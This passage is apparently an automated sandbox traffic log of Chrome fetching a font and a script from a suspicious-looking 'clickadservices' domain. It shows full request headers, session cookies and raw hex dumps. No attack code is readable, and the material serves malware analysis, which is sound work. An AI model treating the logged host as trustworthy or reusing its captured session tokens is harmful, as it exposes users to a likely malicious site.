                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: a3 ce 59 5f c3 25 0b 9d f2 4a e9 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b b2 d1 8a eb d4 09 e1 09 bc 2e 7f c6 88 31 51 e6 fa 1c 6a c5 06 7d 66 4a f0 e0 eb c6 48 eb a6 3e de c9 7a 7d 78 4b d7 98 bd e2 c3 08 cd f3 88 6d ff fa 2e f6 41 89 df d6 d2 4a ff 7b f6 01 aa 12 65 af e8 2b 9c 2a 6b b9 21 bb 8c e8 e3 a7 1f ef 6f bf d7 f8 0b 47 b0 c3 71 a6 2e 6c 7f 81 ee 98 c2 d1 a6 7a dd 76 dd
                                                                                                                                      Data Ascii: Y_%JHXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K.1Qj}fJH>z}xKm.AJ{e+*k!oGq.lzv
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 71 e0 45 cd 17 36 9d d7 1b 32 2a 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd 1a 73 5e 9d 9c 39 5d 1e 8c 82 fe 2c 1f ac a6 0c ba fc c5 27 14 94 19 0f 5f 43 a0 42 02 67 1f be 85 af e9 f8 fc a5 c4 0d b4 f6 ff a2 a2 95 1c ec dd 96 1c e3 1d 16 52 27 61 e2 78 29 ad 1d 7e c2 7e d3 02 91 a1 b6 1e d4 a0 32 62 5d 05 eb 60 2f a3 ce 28 2a e3 76 d1 e6 94 8a 9e 84 ca d4 81 95 59 f2 d3 14 a9 29 ba
                                                                                                                                      Data Ascii: qE62*X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$s^9],'_CBgR'ax)~~2b]`/(*vY)
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 32 f2 52 b9 28 d4 a6 32 9a 40 88 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d aa f7 6a 94 66 cc 30 31 cf 58 e7 eb 7d 07 9e e7 07 f4 ff dd 72 11 79 f7 17 5f 34 4c 30 6f 52 00 13 2c 5d 6a a1 96 01 ec 65 65 8c c9 a0 60 fb 80 e3 33 a2 57 29 00 94 cf 1c 2c af 0c ea d6 9e 38 04 86 2f cf 6a 38 67 ad fd e2 eb f5 49 f1 24 1f c0 fb 3c e2 91 ad 41 0a dd d8 dc da de ed 78 67 77 6f ff 60 6d 3b 3c
                                                                                                                                      Data Ascii: 2R(2@fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRMjf01X}ry_4L0oR,]jee`3W),8/j8gI$<Axgwo`m;<
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 21 b6 b0 88 47 91 d7 a4 a8 59 49 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0 75 81 12 2b 3a af dd 10 60 9b 79 6f a0 89 16 44 eb 3a 5f 22 ef c0 43 4c be cd 4a 39 0e c7 e5 59 da 0b 4e c2 cb e5 0c c1 50 23 94 b7 f3 4e de 25 4a c6 14 ad b2 60 08 6e 56 39 dc aa d3 6a 2d 0f 41 b9 5a df dc ee da de da be da fe 15 9d 13 bc 46 63 60 98 0d 8b 15 9c 87 cd 92 34 67 eb 36 27 78 65 b2 4c 56 6b 35
                                                                                                                                      Data Ascii: !GYI;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~du+:`yoD:_"CLJ9YNP#N%J`nV9j-AZFc`4g6'xeLVk5
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 1c 18 0f 5d 54 95 c8 98 28 93 32 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97 c9 d2 f4 17 66 95 1f bf 28 5e 61 c2 ca 24 35 89 ab 13 55 a5 5c 9f 62 5d f2 f6 6c 6f 17 b8 23 ef de 82 df 2a 60 7b 41 6f 16 f1 7e 31 ad 15 2b a1 9d 92 db 2f b1 dd 08 f8 24 f1 58 b6 cd cf a7 2f 72 be 06 8f cf 43 45 27 ad 4d b5 a1 b3 3a 34 5b ca 51 91 0f 59 c2 86 19 45 7e 58 f8 7b 3d fb a0 a4 f6 ba ef b4 4e 2f
                                                                                                                                      Data Ascii: ]T(2c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.Lf(^a$5U\b]lo#*`{Ao~1+/$X/rCE'M:4[QYE~X{=N/


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      42192.168.2.1649762104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:49 UTC1529OUTGET /efe0FwcSrW02P356lNUUbLQa82mn100 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:50 UTC626INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:50 GMT
                                                                                                                                      Content-Type: font/woff2
                                                                                                                                      Content-Length: 93276
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="efe0FwcSrW02P356lNUUbLQa82mn100"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hxNAUPXI9Uxd9Le3qWdXlkQebsa2yNGEaedOWS4GQfRKQr9fA%2BXehSkOr6B7Qv8JAD2CnpNfN7KWdwaYl1ZVFXW3dbow9qLfhPIEikUnOrdR%2F%2FXfTCLgZ9mMOgvMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b920bd208df-SEA
                                                                                                                                      2024-05-08 18:12:50 UTC743INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                                                                                                      Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 67 bd 3f f3 47 f2 33 13 26 d3 99 30 4c 26 e9 24 85 40 52 36 bb a5 e2 88 55 8c 15 6f 9d dd 3a ed 9a 53 a7 3d 0a d4 1c b3 db 62 55 0b a1 75 ca 5d 7a ac 57 38 5b 55 18 7c 37 fb 27 fe 25 e6 f2 75 2e 9c 88 31 31 8e 19 67 3c c6 ba 5e c7 a0 eb fa 4a c9 da 50 42 1b 4a 48 42 02 11 f0 6b fa b3 0f 0e 89 0a 91 8a 5d c4 80 28 24 a5 0d 44 ae 16 ab 53 22 75 be b7 ce 37 e2 fc ab 39 9f 38 15 a3 ee d4 9c 1a 55 a3 e6 37 13 d4 a6 ed 52 24 04 df 78 a9 f9 ac 67 d0 58 9b 7a 56 81 2c a8 24 a5 19 ab 89 79 c6 3a 8e 8d 8a 88 86 51 24 4f 4d c7 b1 f6 b7 9f 71 cc e7 20 a3 88 08 28 df 96 4f e5 14 c4 00 22 12 64 3c 07 6c c8 ed 39 a9 fd 7c 5e 42 08 72 b6 35 8f d0 c3 f3 a7 fd cc b9 79 69 bb 44 99 0f b9 5f 84 16 09 3c 50 9b f9 6f 92 11 08 a9 28 52 65 ab 49 eb 90 c9 96 9a 40 45 d9 7e f3 ca
                                                                                                                                      Data Ascii: g?G3&0L&$@R6Uo:S=bUu]zW8[U|7'%u.11g<^JPBJHBk]($DS"u798U7R$xgXzV,$y:Q$OMq (O"d<l9|^Br5yiD_<Po(ReI@E~
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 40 42 44 dd f4 16 cf 30 00 2b fb 79 0b 30 ab c4 72 0d 2d 40 8d fe 19 13 b5 2f 74 e2 3e 24 50 23 ab dc 2a 66 4d 64 c4 fc ff 2f 53 ab 6d 24 50 26 09 49 5d 09 75 9d 3e c1 ea 31 1f d2 98 cf 56 cd 54 a8 74 6a 7f 21 1b e3 9c 0f 44 44 22 1d 29 45 26 48 55 24 92 52 07 92 54 55 20 21 75 7d 24 c8 3a 01 40 86 24 32 00 8a cd 24 e5 2d 59 9e 72 a6 cc 4b 24 d5 13 80 aa 7a 82 60 1b 94 34 ce 2d 67 b1 1c ca 96 d5 9c 33 32 e3 a4 1a e3 36 db 24 c7 b1 8d db a9 6a 45 cd 8a 9a 55 8a e3 a8 9a fd 86 aa 55 d5 ac d4 1a bf 33 7e d7 67 f8 e7 6d 4f ce f6 e5 66 e3 7f 46 56 c8 0a 61 36 e5 a3 4e 26 1e 46 a2 08 72 83 40 08 87 47 e1 7f 99 5a a6 68 7c 99 6e 6c d2 0f 2b 33 dc e8 4e 91 71 44 5d 90 6c 29 8d ba 7f af 41 f7 5b 43 0e ce 0d 46 16 90 e1 0e ce 11 23 c7 5d f9 38 5a 60 ce 53 96 94 35
                                                                                                                                      Data Ascii: @BD0+y0r-@/t>$P#*fMd/Sm$P&I]u>1VTtj!DD")E&HU$RTU !u}$:@$2$-YrK$z`4-g326$jEUU3~gmOfFVa6N&Fr@GZh|nl+3NqD]l)A[CF#]8Z`S5
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 28 0a 7e 3f b8 60 01 41 a5 a2 9d 5f aa aa 92 e7 97 9e 00 03 7a 83 f2 df f4 f1 96 7c fe b4 e4 ea d5 9a f9 6c b0 ba 4a 10 6f b7 59 2c ed 74 74 e4 f7 a7 d3 2b 96 40 40 51 66 f5 e7 a0 33 8f 73 f2 d6 c3 e5 9d c3 71 fc 46 72 66 3c 24 2e ce 60 06 3a c8 29 d6 a8 8f 62 ff a8 a5 b5 cd eb 44 76 4b 25 94 fc d0 62 76 e3 42 5d fd 97 64 4c 8b a5 52 6f f8 db 8f 00 94 fc c8 46 5c bd 1c c3 40 2b d1 7a 43 c4 ad 17 b2 b7 ee 9b 4d 09 0d f9 6d 07 99 10 1d 47 e6 96 3a 20 3d bc 3a 0d 3e bf 95 84 ea 25 93 ae 69 08 6c df 80 35 2a 08 70 c7 de 92 9c 79 e0 1a 17 e6 d0 2b 30 1e 2f 83 0e c7 e9 73 30 77 e7 e6 02 22 bb d8 06 99 5b ee 22 53 80 20 c8 6e 2c 06 05 26 12 28 14 52 ba 16 12 3d a2 47 3f 10 f5 06 a5 24 4d 82 75 e6 ad 90 27 62 69 e9 36 4c 84 88 93 25 f6 f6 23 80 28 d3 c5 48 e9 2c
                                                                                                                                      Data Ascii: (~?`A_z|lJoY,tt+@@Qf3sqFrf<$.`:)bDvK%bvB]dLRoF\@+zCMmG: =:>%il5*py+0/s0w"["S n,&(R=G?$Mu'bi6L%#(H,
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: a6 93 cf 99 1f a7 dd 6e 68 53 44 dd 65 65 89 d1 c0 a3 92 64 cc 31 18 63 26 13 31 4e cf 58 79 53 b2 2e db 9a 28 b6 9b 3c a6 00 5c 5e 11 8b 83 4b be 05 32 16 f2 27 f7 9c df b0 9c 1c 87 3a fa 62 03 4e 5f dc 30 32 d9 0e 2d 29 bb 39 86 5a ea 25 1c f9 80 80 d3 b0 59 47 03 e1 38 0e 99 e4 42 e4 67 ce e4 d4 da 88 c7 03 50 4c 29 22 8c 02 70 3a 8b 8a 3b 0f 04 48 26 b5 d1 e4 52 e7 01 3b 4a af d0 d3 a7 68 fe d1 72 c3 4a 60 ba 24 bf 8f 51 eb 11 25 b1 c6 4b 41 a6 d8 73 32 1b 16 4b c4 62 8e e3 36 ec 6e b3 cd 37 b4 0e 4b 95 68 ab 33 1a 0d ac 6a 2b cd a4 45 22 f2 62 82 62 42 1d c3 cc f9 59 5f 50 eb 07 b4 8a da 4d aa 17 47 d3 fa a5 80 8d 11 25 a5 a5 8e 5b 88 5c b9 82 21 5e 88 6c 18 63 03 d6 93 18 f3 cb 40 59 d9 d2 20 37 88 18 e8 62 0c ab b3 f8 99 33 4f d5 ea e1 30 92 c8 8c
                                                                                                                                      Data Ascii: nhSDeed1c&1NXyS.(<\^K2':bN_02-)9Z%YG8BgPL)"p:;H&R;JhrJ`$Q%KAs2Kb6n7Kh3j+E"bbBY_PMG%[\!^lc@Y 7b3O0
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 50 9b 51 70 75 a8 cf 20 94 27 85 0a 16 c2 d5 50 55 97 db 1a cc e4 ea f8 bf 7f 82 9d cf b0 bf bf a8 d2 cf 05 72 5b e8 50 23 0f 23 4b 61 90 94 da f0 4d c9 51 9e 26 0a ec ec ab 69 b4 bd c3 2f 0a f0 74 03 f6 16 2e 59 39 12 0b bc 0c 0d 75 a9 8f 01 48 d7 04 85 96 d2 ab 02 9b de 6d db bd 90 bc 86 ef 83 5a 63 5b 32 e2 71 f8 6e c1 87 75 a9 ee 4c f7 99 27 02 3c 78 27 d8 98 de f7 56 7f 6e f1 fc aa 81 eb 24 c5 fb 60 e0 b0 f2 f0 af dd 25 60 5f 6c d7 6b c0 60 ea 09 fc a1 7e ef 21 d2 65 be 87 84 64 f1 c8 69 fa 9c 49 2f cf 79 79 88 42 e1 4d be 7d 02 60 bf 63 b8 ea ea 63 24 2b 5c 48 cf ca 79 d8 58 89 bd 6f 81 38 cf 87 07 47 13 25 b0 2d d0 2c 71 94 b6 07 95 04 aa e5 65 bc fd e1 eb 93 81 1b a5 d7 ee 19 35 2a 5a aa 17 d4 e1 0e 65 4b 21 2d a7 bf d7 25 e2 9e 22 d1 b9 d0 54 73
                                                                                                                                      Data Ascii: PQpu 'PUr[P##KaMQ&i/t.Y9uHmZc[2qnuL'<x'Vn$`%`_lk`~!ediI/yyBM}`cc$+\HyXo8G%-,qe5*ZeK!-%"Ts
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 60 8b 3c b7 b7 76 cf d3 be da d0 82 50 1b dc 81 52 9f 2b 78 b5 85 1a db 2f 23 11 ee 7e 0f 9c d7 f5 b8 cb 06 d1 4f 79 55 8a 13 9b 6a a8 95 46 95 37 af 7b 7d 90 cb 24 1d 9e 26 31 5b 76 a7 8e 76 62 74 7b e0 dc a7 f1 6e 9f 45 d5 21 b2 23 85 2c cb e7 31 09 a3 7a 4c d0 45 20 b1 44 fe 05 66 c7 02 03 dc df d5 bb 25 f4 ec 02 f0 c1 23 0b fa 7f ae 9b 73 07 7b 16 f5 36 ec ec 00 db ec 7f d4 4b 78 3e 73 73 9f 0a ae ec e5 80 c4 cf 0a 3d 62 99 08 c1 b2 7d c7 70 b5 8c c7 69 52 40 79 3c 9f b9 99 d4 52 6e df 0a 35 b9 f0 ac 83 b5 6c 74 9e b8 70 fd 1d b6 ee 75 41 04 b5 ad 5c 10 e6 ad df 53 fe 59 1e 0a 54 02 09 f8 5e ab e5 8c c5 72 4c 47 c6 3b 62 55 95 51 f0 eb 4f 75 3e 57 a6 36 98 bc fe b1 bc ff 61 18 a2 79 e6 01 b9 02 66 9e 81 b8 b7 6b 51 78 30 95 72 f9 41 95 4f 4c 24 d3 ec
                                                                                                                                      Data Ascii: `<vPR+x/#~OyUjF7{}$&1[vvbt{nE!#,1zLE Df%#s{6Kx>ss=b}piR@y<Rn5ltpuA\SYT^rLG;bUQOu>W6ayfkQx0rAOL$
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: ff 45 1e a2 6d 55 84 60 bb 94 83 f1 a5 aa 10 eb 80 6a 04 ba dd 16 24 bb cb 76 94 bb db 0e 54 fa b4 dd 28 f7 19 9d a8 f4 59 7b 91 ec f3 f6 a1 d0 17 ec 47 b1 2f ea 42 a1 2f 39 80 62 df 74 12 bc df 77 06 bc 3f 73 01 b9 7e ee 71 e4 fb bb 2d ec ef 7f d2 19 f5 41 7b 18 ef 31 87 58 ef 21 27 d1 79 d4 69 74 9e 74 8d 23 23 9b 2c 50 b6 a6 80 27 3b 52 c2 93 d9 40 c0 e7 aa a0 90 01 f3 29 68 ec d8 71 e2 04 83 80 00 e3 c2 05 82 1b 37 71 1e 3c 50 15 2c 96 c1 03 90 05 75 49 6e 2d 19 e1 95 12 4e d0 eb 09 a1 25 6a 42 ad 00 59 26 63 cf 71 3e 9d 2c 30 95 67 c9 12 c6 10 a1 01 97 41 48 16 7e 72 c0 e5 e1 a3 00 5c 91 be b5 13 b4 60 8d 50 60 16 62 8c 23 2c 93 87 41 a6 b8 c0 32 1b d9 cc f1 84 5d ca eb c5 8d 70 d0 ac bc 4b 85 93 72 39 40 ae f8 bc 94 2b 97 55 20 79 76 b5 92 56 dc f5
                                                                                                                                      Data Ascii: EmU`j$vT(Y{G/B/9btw?s~q-A{1X!'yitt##,P';R@)hq7q<P,uIn-N%jBY&cq>,0gAH~r\`P`b#,A2]pKr9@+U yvV
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 00 aa 75 3c 04 9b 2b 02 72 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 ff 0a aa a6 1b a6 65 03 00 88 b0 24 13 ca b8 50 54 ad 3e b1 db 03 04 84 eb 88 80 62 38 41 52 34 c3 72 bc 20 96 b6 51 46 51 6b 9b a9 63 98 56 a3 e2 13 15 c2 04 21 e9 30 60 05 83 86 c4 8f e9 a0 a9 ff f0 17 a0 b7 17 e7 07 65 da fd 98 7e d8 04 c0 0d b5 75 78 ca 39 2a af 15 ac 6d 98 37 9c 46 60 a4 51 46 1b 63 ac 64 29 52 a5 49 97 21 53 56 45 1d 2a 36 25 95 a2 4c b9 8a 2a 47 ac 4a 54 ab 51 5b dd e8 d5 a3 41 e3 73 28 bc 75 10 b4 db 41 a5 28 53 8e 1e d2 f3 3a cc bc 1d 7c fc 10 25 da bd f2 fc a6 e8 16 82 4b 39 b0 71 4d 28 28 c1 54 d4 34 0d d5 a6 e7 9b d7 02 78 db f5 6f 2c 5c 2e 36 76 cf fe a6 f4 a5 10 31 09 09 d0 9e 36 f0 1f 3e 12 3b 49 4b 4b 4b 4b 4b bf cf 6e e5 eb f8 ee 58 bb 05 4a 4b 4b ff df d2
                                                                                                                                      Data Ascii: u<+raEP'HfXre$PT>b8AR4r QFQkcV!0`e~ux9*m7F`QFcd)RI!SVE*6%L*GJTQ[As(uA(S:|%K9qM((T4xo,\.6v16>;IKKKKKnXJKK
                                                                                                                                      2024-05-08 18:12:50 UTC1369INData Raw: 26 02 22 92 13 20 64 14 59 b2 e5 a0 3a 99 67 82 e6 ee 72 cf 1d 66 c7 a3 2c 1a da 79 0f 13 14 29 92 e2 71 c9 44 e4 e7 84 a0 c2 9f f7 0e ba a8 11 61 68 5f fa 1d ff f6 b8 d7 09 45 9d f7 18 61 a2 cf d1 a7 76 8f 13 7e b0 51 c5 d3 5b 09 40 57 2c 6f 6b b6 61 22 ea 37 fd 68 16 80 a1 c0 35 c2 0c d2 3a 85 ef 21 50 78 14 9f 15 27 6e bd a6 4d 6a 70 82 bc 56 5c ed c3 07 4f fc db 7e b8 f3 ce 26 a0 dc bc 05 0a 43 71 81 c0 11 41 31 9c 20 29 9a 61 39 5e 10 3b a3 77 e9 b5 a7 54 3d eb 39 f8 84 11 13 21 91 29 54 1a 9d c1 64 b1 39 5c 5e fe 82 0a 00 c0 d0 b2 c2 20 28 56 b8 c4 22 c4 92 8f 4b c4 db e9 d5 16 77 f3 73 34 90 cb 61 6b a5 67 b8 d1 63 dc 12 db 49 a1 78 8f 3a 70 56 78 9c f7 22 15 6d 55 d4 d2 cd 70 8f 4e b6 dd 48 9f a8 82 3e b4 c1 8c 26 b3 25 20 c1 88 90 c0 08 8a e1 04
                                                                                                                                      Data Ascii: &" dY:grf,y)qDah_Eav~Q[@W,oka"7h5:!Px'nMjpV\O~&CqA1 )a9^;wT=9!)Td9\^ (V"Kws4akgcIx:pVx"mUpNH>&%


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      43192.168.2.1649763104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:49 UTC1471OUTGET /34XulaQandSR5aTPghBsor84ndx89103 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
